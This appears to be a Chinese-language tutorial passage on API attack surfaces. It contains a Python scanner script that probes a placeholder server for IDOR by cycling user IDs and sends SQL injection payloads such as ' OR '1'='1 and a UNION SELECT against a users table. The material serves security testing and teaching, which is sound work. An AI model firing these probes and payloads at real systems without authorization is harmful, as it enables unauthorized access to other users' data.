API 攻擊面分析
API 的六大攻擊面
1. 端點發現 → 找出隱藏 API
2. 認證繞過 → 繞過 JWT / API Key
3. 授權缺陷 → IDOR、水平/垂直提權
4. 輸入驗證 → SQLi、NoSQLi、Command Injection
5. 速率限制 → 暴力破解、DDoS
6. 資訊洩露 → 錯誤訊息、回應過多資料
Vibe Prompt
「幫我建立一個 API 安全掃描腳本:測試目標 API 的认证繞過、IDOR、SQL Injection。」
import requests
class APIScanner:
def __init__(self, base_url):
self.base_url = base_url
self.results = []
def test_idor(self, endpoint, auth_token):
"""測試 IDOR 漏洞"""
headers = {"Authorization": f"Bearer {auth_token}"}
# 嘗試存取其他用戶的資源
for user_id in [1, 2, 3, 100, 999]:
r = requests.get(f"{self.base_url}{endpoint}/{user_id}", headers=headers)
if r.status_code == 200:
self.results.append({
"type": "IDOR",
"endpoint": f"{endpoint}/{user_id}",
"status": r.status_code,
"risk": "高" if user_id != 1 else "低"
})
def test_sqli(self, endpoint):
"""測試 SQL Injection"""
payloads = ["'", "\"", "' OR '1'='1", "' UNION SELECT * FROM users--"]
for payload in payloads:
r = requests.get(f"{self.base_url}{endpoint}?id={payload}")
if any(err in r.text.lower() for err in ["sql", "syntax", "mysql", "unexpected"]):
self.results.append({
"type": "SQL Injection",
"payload": payload,
"status": r.status_code,
"risk": "嚴重"
})
def run(self):
print(f"掃描目標: {self.base_url}")
self.test_idor("/api/users", "test_token_123")
self.test_sqli("/api/search")
if self.results:
print(f"\n發現 {len(self.results)} 個漏洞!")
for r in self.results:
print(f" [{r['risk']}] {r['type']}: {r.get('endpoint', r.get('payload', ''))}")
else:
print("\n未發現明顯漏洞")
scanner = APIScanner("http://test-server.com")
scanner.run()